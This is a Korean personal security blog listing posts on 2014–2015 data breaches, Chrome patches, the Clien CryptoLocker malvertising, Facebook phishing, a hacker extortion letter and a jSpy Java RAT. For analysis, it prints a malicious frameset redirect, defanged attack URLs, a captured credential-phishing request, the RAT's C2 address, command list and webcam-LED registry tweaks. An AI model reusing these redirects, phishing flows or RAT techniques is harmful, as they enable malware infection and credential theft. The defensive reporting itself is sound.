'IT/보안 소식'에 해당되는 글 786건






국내 최대 규모의 휴대폰 커뮤니티 뽐뿌(PPOMPPU) 사이트가 개인정보 약 190만건이 해킹 된 사실이 2015-09-141일 확인되었다.


이번 해킹의 원인은 국내인으로 추정되는 해커에 의해 제로보드 취약점을 이용한 SQL Injection 공격으로 발생되었다고 한다.


이 공격으로 인해 유출 된 개인정보는 아래와 같다.

"회원 정보 ID, 닉네임, 암호화 된 비밀번호, 생년월일, 이메일 주소, 암호화 된 장터 비밀번호, 회원 가입일, 회원 점수


이번 뿜뿌 해킹사건에는 개인정보 뿐만 아니라 이번 해킹으로 인해 악성 어플리케이션(APK)가 추가로 다운로드 되는 

내용도 존재했다.


관련 내용들은 아래의 링크에 자세하게 설명되어 있으니 참고하자^^



□ 뽐뿌 개인정보 유출 관련 내용


현재 뽐뿌에서는 홈페이지에 유출에 관한 공지사항을 팝업으로 알려주고 있다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내 최대 웹기반 RSS 리더인 "한RSS(hanrss)" 사이트가 2015년 5월 31일자로 서비스를 종료한다고 합니다.

블로그를 하면서 다른 이웃블로그 및 외국 블로그들의 RSS를 모두 한RSS로 읽던 저로서는 ㅠㅠ


종료가 너무나 아쉽게 느껴집니다.

요즘 한RSS 접속속도나 뭔가 모르게 좀 이상하다고 느껴지진 했는데, 이럴려고 그랬었나보군요.


[중요공지] 한RSS  서비스 종료 안내



5월 31일에 종료되면 다른 RSS를 찾아가야 하는데 그 동안 모아둔 RSS주소들이 너무 아깝습니다.

이에 RSS 목록을 백업하는 방법에 대해 알아보겠습니다.


한RSS 좌측 중간쯤 보면 "부가기능" 이라고 있습니다.

이 중 RSS목록(OPML) 내보내기를 클릭하시면 됩니다.



그럼 아래 그림과 같이 OPML 파일을 저장 할 수 있습니다.

이 파일을 다른 RSS리더 사이트에 연동하면 지금 받고 있었던 사이트들을 다시 만날 수 있습니다.


괜찮은 RSS 리더 있으시면 댓글로 추천 부탁드려요^^

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




2015년 4월 21일 금일 새벽부터 국내 커뮤니티 사이트인 클리앙에서 악성코드 유포가 있었다.

클리앙측 이야기로는 새벽 01:38분부터 오전 11:12까지 유포가 진행 되었다고 한다.



설치 된 악성코드는 사용자의 문서, 그림, 동영상들을 강제로 암호화 시켜 암호화 해제를 빌미로 돈을 뜯어대는 

랜섬웨어(Ransomware)의 일종으로 Crypt0L0cker(크립토락커) 라는 악성코드로 확인되었다.


크립토락커 랜섬웨어는 이전에도 존재하였지만, 이번이 이슈가 되는 이유는 한글화 작업을 통해 

국내 드라이브 바이 다운로드(Drive-By-Download) 경로를 이용하고 있다는 것이다.


이를 통해 기존의 국내에서 많이 사용되고 있는 SweetOrange Exploit Kit 이나 CK Exploit Kit 도

랜섬웨어를 다운로드 시킬 가능성이 매우 높아졌다.


유포 경로는 클리앙 사이트에 올려진 외부 배너링크를 통해 악성 URL이 넘어 온 것으로 보인다.

클리앙 사이트는 아래 그림과 같이 "메인상단, 우상단, 게시판상단" 총 3개의 외부 배너를 가지고 있었다.


이 중 어떤 곳에서 악성 URL을 연결시켰는지는 알 수 없지만, 외부 광고 배너를 통해 악성URL 이 유포 된 것은 맞는 듯 하다.

(※ 현재는 모든 외부 배너를 삭제 한 상태이다)

(그림 출처 : 클리앙 광고 안내 페이지 http://www.clien.net/cs2/bbs/board.php?bo_table=notice&wr_id=8709)



현재까지 확인 된 내용으로는 아래와 같은 링크와 같은 URL들이 확인 되었다.

(아직 확실한 사실이 아니니 너무 신뢰하진 말자!!)

- 클리앙 외부 배너 광고 서버 URL (아직 미확인)

 ㄴ hxxp://medbps.filmwedding.ro/lrvqdg2.html


hxxp://medbps.filmwedding.ro/lrvqdg2.html

 ㄴ 해당 웹 파일에서 frame 태그를 이용하여 악성 URL로 넘기는 것으로 보인다.


<frameset rows="100%">

<frame src="hxxp://row.bottomwebsites.xyz/bewilders_urchin_platters_valid/17372163791826990">...</frame>



클리앙 크립토락커에 관련되어 개인 보안 블로그 및 보안업체 블로그에도 글이 하나씩 올라오고 있다.


금일 클리앙 외부광고 배너를 통해 설치 된 크립토락커 악성코드의 행위는 아래와 같다.

- 파일 생성

C:\Windows\esihuzaw.exe (Alyac : Trojan.Ransom.cryptolocker)


- 레지스트리 생성

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

"ipumjvuc" = "C:\WINDOWS\esihuzaw.exe"


- 파일 암호화

아래의 확장자를 제외한 모든 파일들을 암호화 알고리즘(RSA-2048)을 이용하여 "원본파일명.encrypted" 로 변경한다. 

(ex : 겨울.jpg.encrypted)

*.chm, *.ini, *.tmp, *.log, *.url, *.lnk, *.cmd, *.bat, *.scr, *.msi, *.sys, *.dll, *.exe


감염 된 PC에서는 아래와 같은 화면등을 볼 수 있다.




이후 암호화 해제를 위해 해독 프로그램을 구입하라는 창도 볼 수 있다.


크립토락커 악성코드에 감염이 되면 악성코드 자체는 삭제가 가능하지만,
암호화 된 파일들은 특정 암호키가 없으면 복구가 불가능 하다.

제작자에게 약 43만원 정도의 금액을 입금하면 암호키를 줄 수도 있겠지만, 무모한 도전은 안하는 것이 좋겠다.

현재 대부분의 보안업체에서 해당 파일을 탐지하고 있으니 사용하는 보안 프로그램을 최신 업데이트로 유지하고
실시간 감시를 켜두는 것이 좋다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




세종시에 위치한 수목원인 베어트리파크개인정보 약 2만 8천건이 웹상에 노출 되는 사실이 2015-04-14일에 확인되었다.


이번 웹상 노출의 원인은 홈페이지 리뉴얼 과정에서 발생되었다고 베어트리파크 측에서 설명하였으며,

일정 시간 동안 웹상에 파일로 노출이 되었지만, 신고 즉시 해당 홈페이지는 삭제조치 하였다고 한다.


웹상에 유출 된 파일에는 2009년부터 지난 2014년 11월까지 가입 한 이용자의 

"이름, 아이디, 비밀번호, 주민등록번호, 우편번호, 주소, 전화번호, 휴대폰번호, 이메일, 가입일" 등 개인에 대한 

모든 정보가 기재되어 있다고 한다.



□ 베어트리파크 개인정보 유출 관련 내용


※ 서버에 저장 된 개인정보는 모두 암호화하여 저장해야 했는데, 이 파일 자체가 암호화가 안되어 있다는건 큰 문제다. 

   이번 홈페이지 리뉴얼을 하면서 DB도 리뉴얼 하길 바란다.



현재 베어트리파크에서는 홈페이지에 유출에 관한 공지사항을 팝업으로 알려주고 있다.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.





Google Chrome 브라우저가 42.0.2311.90 정식 버전으로 업데이트 되었습니다.


이번 42버전에서는 보안취약점도 보안 되었고, 안정화와 새로운 앱이 추가 되었습니다.

- A number of new apps, extension and Web Platform APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)

- The answer to life, the universe and everything (42퍼즐에 대한 구글 이스터에그??)


※ The answer to life, the universe and everything 이 내용은 정확히 어떤걸 말하는지 잘 모르겠다.

   "은하수를 여행하는 히치하이커를 위한 안내서" 에 나오는 퍼즐이라는데 이해를 잘 못하겠음 ㅠㅠ

   아시는 분은 댓글로 설명 좀 ㅋ 이게 왜 구글 크롬 업데이트 내용에 있는건지!!!



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 13건의 High 등급,  6건의 Medium 등급 등 총 51건의 보안 취약점이 업데이트 되었네요.

- Google Chrome 42.0.2311.90 패치 내용

■ High CVE-2015-1235 : Cross-origin-bypass in HTML parser

■ Medium CVE-2015-1236 : Cross-origin-bypass in Blink

■ High CVE-2015-1237 : Use-after-free in IPC

■ High CVE-2015-1238 : Out-of-bounds write in Skia

■ Medium CVE-2015-1240 : Out-of-bounds read in WebGL

■ Medium CVE-2015-1241: Tap-Jacking

■ High CVE-2015-1242 : Type confusion in V8

■ Medium CVE-2015-1244 : HSTS bypass in WebSockets

■ Medium CVE-2015-1245 : Use-after-free in PDFium

■ Medium CVE-2015-1246 : Out-of-bounds read in Blink

■ Medium CVE-2015-1247 : Scheme issues in OpenSearch

■ Medium CVE-2015-1248 : SafeBrowsing bypass


- 내부 보안 취약점 패치 내용

■ CVE-2015-1249 : Various fixes from internal audits, fuzzing and other initiatives.

                      Multiple vulnerabilities in V8 fixed at the tip of the 4.2 branch (currently 4.2.77.14).



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





최근 페이스북에서 계정을 탈취 당한 사용자의 아이디를 이용하여 "야한 동영상(야동 또는 성정적인 동영상)" 사진을

업로드 하고, 해당 피드에 친구리스트를 모두 초대하여 추가적인 로그인 습득을 하기 위한 공격이 유행하고 있다.


이스트소프트의 알약 블로그에 해당 내용이 더 자세하게 나와있으니 참고~!!


알약 블로그 이외에도 Ec0nomist's Lab, viruslab 블로그에 가면 실제로는 더 많은 사례들을 볼 수 있다.


이 방식이 새로운 방식은 아니지만 최근에는 국내 사용자를 타겟으로 빈번하게 발생하고 있는 듯 하다.

(국내 사용자를 타겟으로 한다고 이야기하는 건 개인적으로 국내 동영상을 많이 사용하고 있기 때문이지, 공식적인 내용은 아니다)


이전에는 나한테 직접 오는 경우가 없어서 포스팅을 못하고 있었는데, 운좋게 어제 나에게도 행운이 찾아왔다!!


그럼 어떤식으로 이번 피싱사이트로 유도를 하는지 알아보자.


최초 유포는 위에서 말했듯이 계정을 탈취 당한 사용자가 "야한 동영상(야동 또는 성정적인 동영상)"을 업로드하고,

자신의 친구를 모두 초대시킨다.


이때 초대 된 사용자가 클릭하여 동영상을 볼 수 있게 링크를 걸어둔다.

(나도 초대가 되어 해당 피드를 확인 할 수 있었다 ㅋㅋㅋ)


※ 정말 아쉽게도 최초 유포 사진을 찍지 못함;;;

스크린샷을 찍기 위해 남겨두었었는데 실수로 F5를 누르는 바람에 ㅡ.ㅡ;;;;;;;


암튼, 내가 확인 한 피싱 피드는 아래와 같이 작성되어 있었다.




사진 상단의 문구인 ">.< OMG ... SEXY GIRL KOREA !  Application Video" 에서 Application Video 를 클릭하면 

Facebook 로그인 피싱 사이트로 이동된다.



아래는 정상적인 페이스북 로그인 사이트이다.

전혀 다른게 없다;;



Facebook 로그인 피싱 사이트의 로그인 창에 이메일(전화번호)과 암호를 입력하면 특정 서버에 전송이 되고, 

습득한 계정에 로그인해서 가입되어 있던 그룹에 추가적인 전파를 시도 할 것으로 보인다.


User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: malai-appsnew.com

Content-Length: 243

Connection: Keep-Alive

Cache-Control: no-cache


lsd=AVpTtEad&display=&enable_profile_selector=&legacy_return=1&profile_selector_ids=&trynum=1&timezone=&lgndim=&lgnrnd=022441_u34E&lgnjs=n&email=guest@guest.com&pass=123456789&persistent=1&default_persistent=1&login=%EB%A1%9C%EA%B7%B8%EC%9D%B8



실제로 로그인창에 모든 내용을 기록하면 유투브(YouTube)의 영상페이지로 이동 된다.

(영상은 윙크티비 BJ 비비앙님 ㄷㄷㄷㄷ)



이 과정에서 로그인 클릭 시 유투브 사이트로 이동하는 방식을 좀 알아보려고 했다.


해당 사이트를 분석하다 보니 login.php 내부 로그인폼에 hidden 타입의 input 태그가 입력되어 있었다.


<input type="hidden" name="qsstamp" value="W1tbMjMsMzIsNDksOTAsOTMsOTYsMTA3LDExMiwxMjIsMTM1LDIwNCwyNDEsMjQzLDI0OCwyNjgsMjk0LDMxMiwzMTgsMzIyLDM0MiwzNTQsMzU5LDM2NiwzNzAsMzc5LDM4NywzOTYsNDA4LDQxMSw0MTIsNDE5LDQyNiw0MzMsNTA2LDUyMCw1MjIsNTQxLDU2Miw1NzMsNjAzLDY1OCw2ODNdXSwiQVprQ3FLeUhQenowWEdsQTJTblp1ZFZEV1lOREwxSmFDU1lUa05fZXJYSTYtWGdaZ05SZHBmREdZQlllLWZBdjhyTTMtR1dhbEJnZkRnS2VVaG1MblRpbjlGeW9uWmxibXcyd2hqNFNxNFp3b01qM0VNUnA2ak9ZbndVNDN5LWNrOHNCd29zRUltUW0yR093WFAzUGpnMkJjN3p1Vm5qZV8zaWtqYWU5YzFQZHUzay1uMHQwSWF4ZFhjZTM4bV9ZUEZuWVo1UkU4bHdORXBLUUdBNHdvcEc5Il0=">


value 값에는 Base64로 보이는 데이터가 있어서 디코딩 해봤더니 아래와 같이 복호화가 되었다.

[[[23,32,49,90,93,96,107,112,122,135,204,241,243,248,268,294,312,318,322,342,354,359,366,370,379,387,396,408,411,412,419,426,433,506,520,522,541,562,573,603,658,683]],"AZkCqKyHPzz0XGlA2SnZudVDWYNDL1JaCSYTkN_erXI6-XgZgNRdpfDGYBYe-fAv8rM3-GWalBgfDgKeUhmLnTin9FyonZlbmw2whj4Sq4ZwoMj3EMRp6jOYnwU43y-ck8sBwosEImQm2GOwXP3Pjg2Bc7zuVnje_3ikjae9c1Pdu3k-n0t0IaxdXce38m_YPFnYZ5RE8lwNEpKQGA4wopG9"]


근데....아무리 봐도 이게 어떻게 hxxps://www.youtube.com/watch?v=Q9cVmRrdKAI 이 사이트로 이동을 하는건지

도통 모르겠다;;


포스팅을 보시는 분들 중에서 혹시 아시는분은 댓글로 설명 좀^^

(php 서버라서 내부에서 뭔 짓을 하는지 모르겠음 ㅠㅠ)


계속 이어서....

사용자가 클릭하여 이동 한 Facebook 로그인 피싱 사이트는 실제 미국 쪽에 위치 하는 것을 알 수 있다.



※ 추가 내용

다른 내용이 있는지 구글링 중 다른 이미지도 있어서 그냥 추가해 본다 ㅎㅎㅎ


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





tvN 채널에서 롤러코스터로 유명세를 떨친 탤런트 이해인씨가 최근 파밍사이트로 인해 자신의 계좌에서 5,000만원이 빠져나가는 

피해를 보았다고 합니다.


SNS에 이야기 된 내용을 보면 인터넷을 켜니 "금융감독원 개인정보유출2차 피애예방등록 안내" 창이 계속 팝업되어 자신도 

모르게 등록을 했다고 하는군요.



여기서 집고 넘어가야 할 내용이 있습니다.

이해인씨도 보이스피싱이라고 해서 일부 언론사들도 모두 보이스피싱으로 기사를 올리고 있는 듯 합니다.


하지만 이해인씨가 당한건 보이스피싱이 아니라, 파밍으로 인한 정보유출입니다.


아마도 이런 화면이였을 겁니다.



이런 파밍에 피해를 입는 사람들이 있으니, 파밍 악성코드가 끊임없이 나오는 것 같네요.

아주 안타깝네요 ㅠㅠ




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





한수원쪽은 블로그에 왠만하면 안쓸려고 했는데, 간단하게 적어 두려고 한다.


작년 2014년 12월달에 갑작스럽게 나타난 해커 그룹은 한수원(한국수력원자력)을 타겟으로 지속적인 공격 및 자료유출을 행해왔다.


2015년에 들어와서 잠시 잠잠하나 했더니, 돈이 없다는(!?) 핑계로 다시 한수원을 괴롭히기 시작했다.

그나저나 이야기한 9천여개의 바이러스는 어디에 있는거냐!!



■ 관련 내용


금일 공개 된 경고장의 내용은 아래와 같다.

대한민국 한수원 경고장


한수원과 합수단 분들 오래만이네요.

바이러스 7천 여개를 찾았다는 소식을 듣고 저희도 축하 드려요.

나머지 9천 여개는?

9천 여개의 바이러스들이 무슨 명령을 기다리고 있을까요.

바이러스들이 원전에서 ... 연락이 왔네요.

빨리 바이러스 찾아서 축하를 한번 더 받는 것도 좋지 않을가요.


크리스마스를 무난히 넘긴것은 국민들의 안전이 소중해서 인데요...

우리가 너무 조용히 있었나 보네요.

이번에는 한수원 입장도 생각해서 ... 자료를 선물로 드릴게요.


hxxps://www.dropbox.com/s/xh2t17sq0ksmhoa/1.rar?dl=0


돈이 필요하거든요. 요구만 들어주면 되겠는데...

북유럽과 동남아, 남아메리카의 여러 나라들에서 원전자료를 사겠다고 하는데 자료를 ...

통채로 팔았다가 박대통령님 원전수출에 지장이 될까바 두렵네요.

윤 장관, 시간 좀 주겠으니 잘 생각해보세요.

대통령 보좌를 잘 하셔야 하지 않겠나요.


참 박대통령님, 이번 중동 순방에서 원전수출이 잘 되었으니 기쁘시겠어요. 

자국 원전은 해킹과 바이러스에 어떻게 될지도 모르는데 열심히 원전수출 하시느라 바쁘시겠네요.

근데 박대통령님, 사우디나 UAE에서 혹시 원전사고가 발생해도 한국이 아니라서 상관없다고 하셨다는데 사실인가요?


말이 길어졌는데 돈이 요구되니 ... 우리도 여기서 끝낼가 해요.

몇억달러 아끼려다 더 큰 돈 날려보내지 말고 현명한 판단 하시길 바래요.

요구에 응할 용의가 있으시면 장소와 시간은 너님들이 정하세요.


작년 설날 유엔 사무총장과 전화통화도 잘 하셨네요?

좋은 자료들도 많던데요. 공개되면 어떨런지... 좋지 않을가요.

궁금하시면 nnppgroup@aol.com로 연락주세요 $$$


하와이에서 원전반대그룹 회장, 미 핵.





경고장 중간에 있는 링크를 통해 파일을 받을 수 있으며, 파일내용은 원전 도면으로 보이는 그림파일과 박대통령 통화 내용이

적힌 HWP 파일이 압축되어 있다.




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.





Google Chrome 브라우저가 41.0.2272.76 정식 버전으로 업데이트 되었습니다.


이번 41버전에서는 보안취약점도 보안 되었고, 새로운 기능보다는 안정화와 새로운 앱이 추가 되었습니다.

- A number of new apps/extension APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 13건의 High 등급,  6건의 Medium 등급 등 총 51건의 보안 취약점이 업데이트 되었네요.

- Google Chrome 41.0.2272.76 패치 내용

■ High CVE-2015-1232 : Out-of-bounds write in media

■ High CVE-2015-1213 : Out-of-bounds write in skia filters

■ High CVE-2015-1214 : Out-of-bounds write in skia filters

■ High CVE-2015-1215 : Out-of-bounds write in skia filters

■ High CVE-2015-1216 : Use-after-free in v8 bindings

■ High CVE-2015-1217 : Type confusion in v8 bindings

■ High CVE-2015-1218 : Use-after-free in dom

■ High CVE-2015-1219 : Integer overflow in webgl

■ High CVE-2015-1220 : Use-after-free in gif decoder

■ High CVE-2015-1221 : Use-after-free in web databases

■ High CVE-2015-1222 : Use-after-free in service workers

■ High CVE-2015-1223 : Use-after-free in dom

■ High CVE-2015-1230 : Type confusion in v8

■ Medium CVE-2015-1224 : Out-of-bounds read in vpxdecoder

■ Medium CVE-2015-1225 : Out-of-bounds read in pdfium

■ Medium CVE-2015-1226 : Validation issue in debugger

■ Medium CVE-2015-1227 : Uninitialized value in blink

■ Medium CVE-2015-1228 : Uninitialized value in rendering

■ Medium CVE-2015-1229 : Cookie injection via proxies


- 내부 보안 취약점 패치 내용

■ CVE-2015-1231 : Various fixes from internal audits, fuzzing and other initiatives.

                      Multiple vulnerabilities in V8 fixed at the tip of the 4.1 branch (currently 4.1.0.21).



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





2014년 갑오년이 지나고, 2015년 을미년의 해가 벌서 19일이나 지나왔다.

국내외 보안업체들도 올해 2015년에 유행 또는 위험이 될 만한 사항들을 예측하기 시작했다.
꼭 보안에 위협이 되는 내용만 적은 것은 아니고, 2015년에 보안에 이슈가 될 만한 예측도 있으니 참고해서 보시기 바람

간단하게 링크만 지속적으로 업데이트 할 예정!!


2014년에는 어떤 위협이 있었는지 다시 한번 돌아보는 것도 좋을 듯 하다.


2015년에는 아래와 같은 국내외 보안업체가 2015년에 위협이 될 사항들에 대해 예측하고 있다.




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





이스트소프트(ESTsoft)에서 개발 한 국내 무료백신 프로그램 알약(ALYac)바이러스 토탈(VirusTotal) 사이트에 

새롭게 추가되었다.


엔진 추가까지 고생하신분들께 감사의 말씀을...참잘했어요



- 바이러스 토탈 블로그 원문 보기 : http://blog.virustotal.com/2014/11/virustotal-alyac.html

We welcome ESTsoft ALYac engine to VirusTotal. This South Korean multi-engine antivirus includes its own engine called Tera plus the popular BitDefender engine. In the words of the company:

"ALYac provides differentiated service with the award winning Triple-Engines.
The ESTsoft's Tera Engine, the BitDefender Engine and the Sophos Engine establish several protection layers.

With the lightweighted engine and the memory optimization, ALYac minimizes its resource usage.
Moreover, ALYac boasts excellent detection power against variant malicious files through 'Smart Scan Technology'."


https://www.virustotal.com/ko/file/c046cdf42816d711faaf120e6f70c5a29e146595baff204e13727c4bf3c8ff29/analysis/1417052511/



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


(※ 11월 19일 39버전이 정식으로 업데이트 되었지만, 이후 마이너 업데이트가 1회 있어서 39.0.2171.71이 최신이다)


Google Chrome 브라우저가 39.0.2171.65 정식 버전으로 업데이트 되었습니다.


이번 39버전에서는 보안취약점도 보안 되었지만, 기능적인 부분도 추가 되었습니다.

- 64-bit support for Mac (64Bit Mac OS 지원)

- A number of new apps/extension APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 11건의 High 등급,  1건의 Medium 등급 등 총 42건의 보안 취약점이 업데이트 되었네요.

- Google Chrome 39.0.2171.65 패치 내용

■ High CVE-2014-7899 : Address bar spoofing

■ High CVE-2014-7900 : Use-after-free in pdfium

■ High CVE-2014-7901 : Integer overflow in pdfium

■ High CVE-2014-7902 : Use-after-free in pdfium

■ High CVE-2014-7903 : Buffer overflow in pdfium

■ High CVE-2014-7904 : Buffer overflow in Skia

■ High CVE-2014-7905 : Flaw allowing navigation to intents that do not have the BROWSABLE category

■ High CVE-2014-7906 : Use-after-free in pepper plugins

■ High CVE-2014-0574 : Double-free in Flash

■ High CVE-2014-7907 : Use-after-free in blink

■ High CVE-2014-7908 : Integer overflow in media

■ Medium CVE-2014-7909 : Uninitialized memory read in Skia


- 내부 보안 취약점 패치 내용

■ CVE-2014-7910 : Various fixes from internal audits, fuzzing and other initiatives



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




11월 6일 특정 인터넷뱅킹 및 금융 결제 서비스 이용시 필수적으로 설치가 필요한 (주)잉카인터넷 보안 업체에서 제공하는 

nProtect Netizen v5.5 보안 솔루션에서 원격 코드 실행이 가능한 보안 취약점이 발견되었다.


취약점 내용은 공격자가 특수하게 제작한 웹페이지를 취약한 nProtect Netizen이 설치된 사용자에게 방문을 유도하여 

악성코드에 감염시킬 수 있다고 하는군요.


[영향을 받는 소프트웨어 및 업데이트 버전]

■ nProtect Netizen v5.5 버전
- C:\Program Files\INCAInternet\nProtect Netizen v5.5\npenkInstaller5.dll (2014.11.4.6 버전을 제외한 하위 버전)
- C:\Program Files\INCAInternet\nProtect Netizen v5.5\npenkInstaller5x64.dll (2014.11.4.6 버전을 제외한 하위 버전)


자세한 내용은 아래의 링크들에서 확인 할 수 있습니다.

□ 관련 내용


※ 취약점 공지 뿐만 아니라, nProtect 에서는 기존의 취약점이 존재하는 모듈을 각 보안업체를 통해 삭제하도록 

합의가 되었기 때문에 기존 백신(알약, 안랩, 엔프로텍트, 하우리)에서 관련 모듈들을 탐지 해도 놀라지 마세요.




알약에서는 현재 Misc.Suspicious.NTZ 탐지명으로 진단이 되고 있다.



하우리에서는 현재 Exploit.파일사이즈 탐지명으로 진단이 되고 있다.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



10월 2일 개인메일 사서함으로 스팸메일 한통이 왔다.

최근 스팸이 잘 안왔는데, 역시 의리메일!! 감사 ㅋㅋ


□ 관련 내용


그럼 간단하게 스팸메일을 확인 해 보자.


우선 전달 된 스팸메일은 아래와 같이 오니 주의하길 바란다....!!



- 스팸메일 내용

제목 : Re: Please resend the confirmation payment


본문 : 

Hello

 

Please Note:

The money is not in the account yet so I check the attached payment slip and it looks like there is a mistake on it.

 

The SWIFT Code should be BARCGB210LC and not only OLC like you wrote. Kindly check your account if the

 

money has not been debited so you can re-send it now and if your account has been debited please let me know.

 

Scbbd Trading Ltd.

 

Address: 2 Mohamed Refaat St., El Nozha, Cairo, Egypt .

 

Tel: +202 26206 957 , Fax: +202 26206 958

 

E-mail: Moteevc@scbbdtrading.net

 

Mobile: +2 0100 1421 979

 

Skype: Amoteleccvs.


첨부파일 : Docs.jar



스팸메일에 첨부 된 Docs.jar 파일은 자바의 실행 파일로써, RAT(Remote Access Tool : 원격 제어 툴)의 일종으로 

감염 된 PC를 조정 할 수 있는 악성파일이다.


※ 해당 분석 정보는 상세 분석이 아니기 때문에, 빠진 내용이 많이 있음을 미리 알려 드림!!

- 사용자 정보 수집

OS종류(Linux, mac, windows) 

OS버전

컴퓨터이름

맥어드레스

시스템 루트 경로


- 추가 플러그인 실행

DisableWebcamLightsStub.jar : 웹캠의 LED 해제, 네트워크 어탭터의 LED 해제

MessageBox.jar


"SYSTEM\\CurrentControlSet\\Control\\Class\\{6BDD1FC6-810F-11D0-BEC7-08002BE2092F}\\0000\\Settings", "Default", "0");

"SYSTEM\\CurrentControlSet\\Control\\Class\\{6BDD1FC6-810F-11D0-BEC7-08002BE2092F}\\0001\\Settings", "Default", "0");

"SYSTEM\\CurrentControlSet\\Control\\Class\\{6BDD1FC6-810F-11D0-BEC7-08002BE2092F}\\0002\\Settings", "Default", "0");

"SYSTEM\\CurrentControlSet\\Control\\Class\\{6BDD1FC6-810F-11D0-BEC7-08002BE2092F}\\0003\\Settings", "Default", "0");

"SYSTEM\\CurrentControlSet\\Control\\Class\\{6BDD1FC6-810F-11D0-BEC7-08002BE2092F}\\0004\\Settings", "Default", "0");

"SYSTEM\\CurrentControlSet\\Control\\Class\\{6BDD1FC6-810F-11D0-BEC7-08002BE2092F}\\0005\\Settings", "Default", "0");

"SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\0015", "LedMode", "0");



- 키로깅

오픈소스인 JNativeHook 라이버리를 사용하여 1시간 마다 년-월-일-시(2014-10-07-10.txt)로 파일을 만들어 

사용자의 키로깅을 기록


파일의 위치는 C:\Documents and Settings\[사용자]\js_logs\2014-10-07-10.txt


- 네트워크 접속 및 악성코드 정보

서버IP : 193.0.200.136

Port : 2209

시작 파라미터 : ture

ID : jSpy Session

버전 : 0.32

숨김모드 파라미터 : ture


- 봇 기능

LOGIN

CONNECT

ACCEPTED

DECLINED

WEBSITE 

WEBSITEH

DOWNLOAD

UDP

GET

POST

SCREEN

STARTCAM

CAM

STOPCAM

LOG

SHELL

SHUTDOWN

CLOSE

UNINSTALL

UPLOAD

CLICKRIGHT

CLICKLEFT

OFFLINELOG

EXPLORER

DELETEFILE

INJECTJAR

EXECUTE

GETFILE

MESSAGE

STARTCHAT

ENDCHAT

GETSEP

STARTCRAZY

STOPCRAZY

SENDKEY

DISPOSESCREEN


Jar 파일은 아래와 같이 압축형태로 되어 있기 때문에, 파일 내부를 확인 할 수 있다.



※ 해당 파일은 Allatori Java obfuscator 5.0 Demo 버전으로 난독화 되어 있어 분석이 아주 까다롭다.



현재 알약에서는 스팸메일과 관련 된 "Docs.jar" 파일을 "Trojan.Java.RAT.A" 로 탐지 된다.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내 동영상 공유 사이트인 판도라TV(PANDORA.TV)개인정보 약 11만건이 유출 된 사실이 2014-10-13일에 확인되었다.


이번 유출은 중국 해커로 추정되는 외부 해킹에 의해 정보가 유출 된 것으로 추정되고 있으며, 

경기도 분당경찰서에서 수사를 진행 중이라고 한다.


유출 된 개인정보는 "아이디, 패스워드, 이름, 생년월일, 주소, 이메일, 전화번호" 로 총 7개 항목이 유출되었으며,

주민번호, 계좌번호 등의 민감 정보는 서버에 보관하고 있지 않다고 한다.



□ 판도라TV 개인정보 유출 관련 내용


※ 뉴스와 판도라 TV공지사항에 의하면 2014년 9월 9일, 9월 17일 2차례에 걸쳐 서버해킹을 통해

870만 7,838건의 회원정보 중 745만 5,074건의 개인정보를 열람하였으며, 그 중 11만 4,707건의 개인정보가 외부로 유출된 것으로 파악 된다고 한다.



현재 판도라TV에서는 홈페이지에 유출에 관한 공지사항을 기재하였다.

(판도라TV뿐만 아니라 개인정보 유출에 대한 내용은 공지사항 뿐만 아니라, 팝업으로 좀 알렸으면 한다)

또한 유출 사실 개인별 조회 사이트는 아직 제공되지 않고 있다.



